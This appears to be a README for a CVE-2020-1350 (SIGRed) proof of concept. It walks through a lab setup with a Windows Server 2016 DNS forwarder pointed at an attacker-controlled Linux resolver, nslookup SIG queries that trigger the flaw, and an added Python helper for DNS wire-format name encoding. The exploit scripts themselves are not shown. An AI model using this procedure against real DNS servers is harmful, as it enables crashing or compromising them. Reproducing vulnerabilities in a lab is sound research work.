CVE-2020-1350 Proof-of-Concept
- Download Windows Server 2016
- Download a Linux box (a secondary box to run this script)
- Install Active Directory/DNS on Windows Server 2016 (let's say you named your legitimate domain 33y0re.com)
- Have NO DNS records on the Windows Server 2016 box (yet)
- Create a "forwarder" on the Windows Server 2016 image pointing at the IP of the Linux box, so queries for names the server is not authoritative for are forwarded to the attacker-controlled resolver
- Choose your domain (the "attacking" domain)
- Calculate the length of each label (e.g. blah is 0x4 bytes and net is 0x3 bytes)
- Set domain_correct to the DNS wire-format encoding of that name, i.e. each label prefixed by its length byte and terminated by a zero byte: \x04blah\x03net\x00
- Run:
python UDP_Response.py & python TCP_Response.py
- Run from the Windows Server 2016 image or the Linux box:
nslookup -type=sig 33y0re.com ACTIVE_DIRECTORY_DNS_SERVER_IP
followed by:
nslookup -type=sig 9.MALICIOUS_DOMAIN_FROM_LINUX_BOX_SCRIPT ACTIVE_DIRECTORY_DNS_SERVER_IP
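The wire-format name that domain_correct expects can be produced (and checked) instead of counting label bytes by hand. The helper below is an added example and is not part of UDP_Response.py or TCP_Response.py; it implements the RFC 1035 label encoding for any domain name (each label prefixed by a one-byte length, terminated by a zero byte, labels limited to 63 bytes and the whole name to 255 bytes), renders the bytes as the \xNN literal you paste into the script, and decodes the result back to confirm it round-trips. The function and variable names are assumptions chosen for this example.

```python
# Added example: DNS wire-format name encoding, as used for the domain_correct
# value in the PoC. Not part of the PoC scripts themselves.

MAX_LABEL = 63   # RFC 1035 2.3.4: a label is at most 63 octets
MAX_NAME = 255   # RFC 1035 2.3.4: a full name is at most 255 octets


def label_lengths(name: str) -> list:
    """Return [(label, length_in_bytes), ...] for a dotted name.
    For "blah.net" this gives [("blah", 4), ("net", 3)]."""
    return [(lbl, len(lbl.encode("ascii"))) for lbl in name.rstrip(".").split(".")]


def encode_dns_name(name: str) -> bytes:
    """Encode a dotted name into DNS wire format: one length byte per label,
    then the label bytes, then a terminating zero byte.
    "blah.net" -> b"\x04blah\x03net\x00"."""
    out = bytearray()
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")          # DNS labels on the wire are bytes
        if not raw:
            raise ValueError("empty label in %r" % name)
        if len(raw) > MAX_LABEL:
            raise ValueError("label %r longer than %d bytes" % (label, MAX_LABEL))
        out.append(len(raw))                 # length prefix
        out += raw
    out.append(0)                            # root label terminates the name
    if len(out) > MAX_NAME:
        raise ValueError("encoded name longer than %d bytes" % MAX_NAME)
    return bytes(out)


def as_python_literal(wire: bytes) -> str:
    """Render wire bytes the way the README writes them: printable ASCII
    letters/digits as-is, everything else as \\xNN escapes."""
    return "".join(
        chr(b) if b < 128 and chr(b).isalnum() else "\\x%02x" % b for b in wire
    )


def decode_dns_name(wire: bytes, offset: int = 0) -> tuple:
    """Decode an uncompressed wire-format name starting at `offset`.
    Returns (dotted_name, offset_after_name). Compression pointers
    (top two bits set in the length byte) are rejected because a name
    pasted into domain_correct must be a plain label sequence."""
    labels = []
    while True:
        if offset >= len(wire):
            raise ValueError("name runs past end of buffer")
        length = wire[offset]
        offset += 1
        if length == 0:
            break
        if length & 0xC0:
            raise ValueError("compression pointer not allowed here")
        labels.append(wire[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), offset


if __name__ == "__main__":
    # "blah.net" is the README's own example of an attacking domain.
    wire = encode_dns_name("blah.net")
    print(label_lengths("blah.net"))
    print("domain_correct =", as_python_literal(wire))
    print(decode_dns_name(wire))
```

Paste the printed literal into the script's domain_correct; the decode step is a cheap sanity check that the value you pasted is the name you intended, which matters because a wrong length byte silently shifts every label after it.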